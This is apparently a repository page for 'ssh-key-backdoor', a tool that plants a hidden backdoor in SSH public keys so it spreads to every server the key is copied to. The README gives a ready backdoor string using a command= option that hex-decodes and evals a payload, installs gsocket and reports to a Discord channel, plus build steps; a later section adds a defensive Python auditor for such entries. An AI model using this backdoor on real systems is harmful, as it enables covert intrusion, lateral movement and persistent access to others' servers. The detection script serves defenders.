• Stars: 319
• Rank 131,021 (Top 3 %)
• Language: Shell
• Created over 1 year ago
• Updated over 1 year ago


Repository Details

ssh-key-backdoor

This program generates a backdoor to hide inside an SSH public key (e.g. id_rsa.pub or authorized_keys). The backdoor will execute once when the user next logs in.


The objective is to use the ssh public key to move laterally within a target network. It exploits the fact that users copy their public ssh key to other servers without checking the content. Any server where their public key is copied will automatically get backdoored.


See https://blog.thc.org/infecting-ssh-public-keys-with-backdoors for details

Simply add the following backdoor-string to the beginning of the public key (id_rsa.pub or authorized_keys), i.e. in front of, but not including, the "ssh-ed25519 AAA..." part:

no-user-rc,no-X11-forwarding,command="`###---POWERSHELL---`;eval $(echo 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|xxd -r -ps);" ssh-ed25519 AAAAC3Nzblah....

This DEMO backdoor-string installs https://www.gsocket.io/deploy and reports the success back to our Discord channel.

Think of the ssh public key as a sort of ~/.bashrc with your backdoor inside: it gets propagated by the user to various servers and, when triggered, sends a secret login code back to us.

Create your own backdoor-string by editing ssh-key-backdoor.sh (between ---BEGIN BACKDOOR--- and ---END BACKDOOR---) and execute:

# Set your own discord key or the results will be reported to our Discord channel. Please.
$ export KEY="1246565073951234567/mEDRabcdefghijklnopqrstuvwxzyABCDEahagasdKr7YQmA0Ej1-Ibdaytta_XGGq-n"
$ ./ssh-key-backdoor.sh

# Or view the clear commands without hex-encoding
$ ./ssh-key-backdoor.sh clear

(The same command= trick can be used to trigger a canary or start other hidden services.)
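The defensive counterpart of the command= trick is an audit of every authorized_keys and *.pub file for entries that carry options in front of the key type. The script below is an added example, not part of the ssh-key-backdoor repository or THC's code: it parses the option field with OpenSSH's quoting rules (double quotes, backslash escapes, commas inside quotes), extracts any command="..." forced command, and flags commands that decode and evaluate data inline (eval, xxd -r, base64 -d, command substitution), which a legitimate forced command such as git-shell or a fixed backup script does not need. The authorized_keys content it runs on is constructed sample data with fake key blobs; the hex in the sample command decodes to a harmless "echo hi".

```python
"""Audit authorized_keys / id_*.pub entries for forced commands that look like droppers.

Added example, not code from the ssh-key-backdoor repository. The sample
input below is constructed; the key blobs are placeholders, not real keys.
"""
import re
import sys

# Key types sshd accepts, optionally as certificates or sk-* variants.
KEY_TYPE_RE = re.compile(
    r"^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp(256|384|521)"
    r"|sk-(ssh-ed25519|ecdsa-sha2-nistp256))(@openssh\.com|-cert-v01@openssh\.com)?$"
)

# Constructs that an admin-written forced command has no reason to contain:
# inline decoding piped into a shell, eval, and command substitution.
SUSPICIOUS_RE = re.compile(r"(\beval\b|xxd\s+-r|base64\s+(-d|--decode)|\$\(|`)")


def first_token(line):
    """Return (token, rest): token ends at the first whitespace outside double quotes."""
    in_q, i = False, 0
    while i < len(line):
        c = line[i]
        if c == "\\" and in_q:          # escaped character inside quotes
            i += 2
            continue
        if c == '"':
            in_q = not in_q
        elif c.isspace() and not in_q:
            return line[:i], line[i:].strip()
        i += 1
    return line, ""


def split_options(field):
    """Split the option field on commas, honouring quotes and backslash escapes as sshd does."""
    opts, cur, in_q, i = [], [], False, 0
    while i < len(field):
        c = field[i]
        if c == "\\" and in_q and i + 1 < len(field):
            cur.append(field[i + 1])    # keep the escaped char, drop the backslash
            i += 2
            continue
        if c == '"':
            in_q = not in_q             # quotes delimit, they are not part of the value
        elif c == "," and not in_q:
            opts.append("".join(cur))
            cur = []
        else:
            cur.append(c)
        i += 1
    if cur:
        opts.append("".join(cur))
    return opts


def parse_line(line):
    """Return a dict with options/keytype/blob/comment, or None for blank and comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    tok, rest = first_token(line)
    if KEY_TYPE_RE.match(tok):          # no option field: the line starts with the key type
        options, keytype = [], tok
    else:                               # anything before the key type is the option field
        options = split_options(tok)
        keytype, rest = first_token(rest)
    blob, comment = first_token(rest)
    return {"options": options, "keytype": keytype, "blob": blob, "comment": comment}


def audit(text):
    """Classify every key entry as clean, forced-command, or suspicious."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        entry = parse_line(raw)
        if entry is None:
            continue
        cmd = next((o[len("command="):] for o in entry["options"] if o.startswith("command=")), None)
        if cmd is None:
            verdict = "clean"
        elif SUSPICIOUS_RE.search(cmd):
            verdict = "suspicious"
        else:
            verdict = "forced-command"
        findings.append({"line": n, "keytype": entry["keytype"], "comment": entry["comment"],
                         "command": cmd, "verdict": verdict})
    return findings


# Constructed sample: one plain key, one legitimate forced command, one decode-and-eval entry.
SAMPLE = """\
# constructed sample authorized_keys, not a real file
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKE alice@laptop
command="/usr/bin/git-shell -c \\"$SSH_ORIGINAL_COMMAND\\"",no-port-forwarding ssh-rsa AAAAB3FAKE deploy@ci
no-user-rc,no-X11-forwarding,command="`###---POWERSHELL---`;eval $(echo 6563686f206869|xxd -r -ps);" ssh-ed25519 AAAAC3NzFAKE bob@host
"""

if __name__ == "__main__":
    # Usage: python audit_authorized_keys.py [path]   (defaults to the constructed sample)
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for f in audit(data):
        print(f"line {f['line']}: {f['verdict']:15} {f['keytype']} {f['comment']}"
              + (f"  command={f['command']!r}" if f["command"] else ""))
```

Run it against ~/.ssh/authorized_keys on each host a key was copied to; a "suspicious" verdict on a key that was never meant to carry a forced command is the signature of this technique, and "forced-command" entries are worth a second look even when they match what the administrator intended.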


This goes deep down the Bash rabbit hole... the curious reader may like to read our blog.

More Repositories

1. thc-tips-tricks-hacks-cheat-sheet (Shell, 2,930 stars): Various tips & tricks
2. gsocket (C, 1,396 stars): Connect like there is no firewall. Securely.
3. THC-Archive (HTML, 672 stars): All releases of the security research group (a.k.a. hackers) The Hacker's Choice
4. thc-tesla-powerwall2-hack (458 stars): TESLA PowerWall 2 Security Shenanigans
5. segfault (Shell, 325 stars)
6. bpfhacks (156 stars): eBPF hacks
7. zapper (C, 134 stars): Zaps arguments and environment from the process list
8. CVE-2021-26855 (Python, 62 stars): PoC of proxylogon chain SSRF (CVE-2021-26855) to write file by testanull, censored by github
9. ttyinject (C, 56 stars): Get root via TTY / TIOCSTI stuffing
10. thc-btc-rng-bruteforce (C, 49 stars)
11. ssh-it (C, 37 stars): Self replicating and automatically spreading SSH worm that recovers login credentials
12. erfs (Shell, 36 stars)
13. thc-arpmitm (C, 27 stars): ARP Man-in-the-Middle tool
14. thc-rut (Objective-C, 26 stars): THC "R U There" network discovery tool
15. gs-transfer (C, 25 stars): Secure File Transfer via Global Socket Bounce Network
16. gsocket-relay (C, 23 stars): Global Socket Server
17. dsniff (C, 22 stars)
18. docker-thc-hacker (Shell, 14 stars): Docker environment for hackers
19. iran-ssh-proxy (Shell, 13 stars): Docker Server Side for the Iran Proxy
20. binary (13 stars): Binary and Static Releases
21. hackerschoice.github.io (12 stars): The Hacker's Choice
22. kb (11 stars): The Hacker's Choice Knowledge Base & Articles
23. docker-erfs-server (Shell, 7 stars)
24. cryptostorm (Shell, 6 stars): CryptoStorm.is WireGuard docker container
25. thc-art (6 stars): Artistic work by THC
26. gsocket.io (4 stars): Web pages for gsocket.io
27. mail (Perl, 2 stars): A Free Mail Forwarding Service
28. hackshell (2 stars): Make BASH stealthy and hacker friendly with lots of bash functions
29. dnsgw (Go, 2 stars)
30. thc-freezer-monitor (Python, 1 star): Raspberry Pi + MQTT + ThingSpeak + IFTTT
31. memexec (PHP, 1 star): Circumventing "noexec" mount flag to execute arbitrary linux binaries by ptrace-less process injection